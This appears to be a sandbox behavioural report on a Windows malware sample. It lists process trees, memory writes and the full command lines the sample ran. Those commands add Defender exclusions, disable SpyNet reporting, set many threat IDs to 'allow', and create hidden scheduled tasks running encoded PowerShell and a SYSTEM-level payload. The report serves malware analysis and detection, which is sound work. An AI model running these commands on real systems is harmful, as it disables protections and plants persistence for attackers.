N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\BhFFFdy.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 420 wrote to memory of 3868 N/A C:\Users\Admin\AppData\Local\Temp\cd397b8859f41846902412c7a48da2adf6f5c0dba1497457009e0495aa01fda6.exe C:\Users\Admin\AppData\Local\Temp\7zS4575.tmp\Install.exe
PID 420 wrote to memory of 3868 N/A C:\Users\Admin\AppData\Local\Temp\cd397b8859f41846902412c7a48da2adf6f5c0dba1497457009e0495aa01fda6.exe C:\Users\Admin\AppData\Local\Temp\7zS4575.tmp\Install.exe
PID 420 wrote to memory of 3868 N/A C:\Users\Admin\AppData\Local\Temp\cd397b8859f41846902412c7a48da2adf6f5c0dba1497457009e0495aa01fda6.exe C:\Users\Admin\AppData\Local\Temp\7zS4575.tmp\Install.exe
PID 3868 wrote to memory of 4728 N/A C:\Users\Admin\AppData\Local\Temp\7zS4575.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 3868 wrote to memory of 4728 N/A C:\Users\Admin\AppData\Local\Temp\7zS4575.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 3868 wrote to memory of 4728 N/A C:\Users\Admin\AppData\Local\Temp\7zS4575.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 3868 wrote to memory of 4152 N/A C:\Users\Admin\AppData\Local\Temp\7zS4575.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 3868 wrote to memory of 4152 N/A C:\Users\Admin\AppData\Local\Temp\7zS4575.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 3868 wrote to memory of 4152 N/A C:\Users\Admin\AppData\Local\Temp\7zS4575.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 4728 wrote to memory of 3336 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4728 wrote to memory of 3336 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4728 wrote to memory of 3336 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4152 wrote to memory of 2428 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4152 wrote to memory of 2428 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4152 wrote to memory of 2428 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2428 wrote to memory of 1120 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2428 wrote to memory of 1120 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2428 wrote to memory of 1120 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 3336 wrote to memory of 4332 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 3336 wrote to memory of 4332 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 3336 wrote to memory of 4332 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2428 wrote to memory of 4532 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2428 wrote to memory of 4532 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2428 wrote to memory of 4532 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 3336 wrote to memory of 3676 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 3336 wrote to memory of 3676 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 3336 wrote to memory of 3676 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 3868 wrote to memory of 4352 N/A C:\Users\Admin\AppData\Local\Temp\7zS4575.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 3868 wrote to memory of 4352 N/A C:\Users\Admin\AppData\Local\Temp\7zS4575.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 3868 wrote to memory of 4352 N/A C:\Users\Admin\AppData\Local\Temp\7zS4575.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 3868 wrote to memory of 224 N/A C:\Users\Admin\AppData\Local\Temp\7zS4575.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 3868 wrote to memory of 224 N/A C:\Users\Admin\AppData\Local\Temp\7zS4575.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 3868 wrote to memory of 224 N/A C:\Users\Admin\AppData\Local\Temp\7zS4575.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 3056 wrote to memory of 1492 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\gpupdate.exe
PID 3056 wrote to memory of 1492 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\gpupdate.exe
PID 3868 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\7zS4575.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 3868 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\7zS4575.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 3868 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\7zS4575.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 3868 wrote to memory of 1232 N/A C:\Users\Admin\AppData\Local\Temp\7zS4575.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 3868 wrote to memory of 1232 N/A C:\Users\Admin\AppData\Local\Temp\7zS4575.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 3868 wrote to memory of 1232 N/A C:\Users\Admin\AppData\Local\Temp\7zS4575.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 3156 wrote to memory of 772 N/A C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\QBOHpSH.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3156 wrote to memory of 772 N/A C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\QBOHpSH.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3156 wrote to memory of 772 N/A C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\QBOHpSH.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 772 wrote to memory of 4916 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 772 wrote to memory of 4916 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 772 wrote to memory of 4916 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4916 wrote to memory of 2416 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4916 wrote to memory of 2416 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4916 wrote to memory of 2416 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 772 wrote to memory of 1860 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 772 wrote to memory of 1860 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 772 wrote to memory of 1860 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 772 wrote to memory of 3052 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 772 wrote to memory of 3052 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 772 wrote to memory of 3052 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 772 wrote to memory of 4088 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 772 wrote to memory of 4088 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 772 wrote to memory of 4088 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 772 wrote to memory of 1032 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 772 wrote to memory of 1032 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 772 wrote to memory of 1032 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 772 wrote to memory of 4132 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 772 wrote to memory of 4132 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\cd397b8859f41846902412c7a48da2adf6f5c0dba1497457009e0495aa01fda6.exe

"C:\Users\Admin\AppData\Local\Temp\cd397b8859f41846902412c7a48da2adf6f5c0dba1497457009e0495aa01fda6.exe"

C:\Users\Admin\AppData\Local\Temp\7zS4575.tmp\Install.exe

.\Install.exe /dEKGWdidYWnQ "385118" /S

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gmFkGytwz" /SC once /ST 03:37:37 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gmFkGytwz"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gmFkGytwz"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bCAdHbOFiqtMCRhbmR" /SC once /ST 11:02:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\QBOHpSH.exe\" hl /HDsite_idgBh 385118 /S" /V1 /F

C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\QBOHpSH.exe

C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\QBOHpSH.exe hl /HDsite_idgBh 385118 /S

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

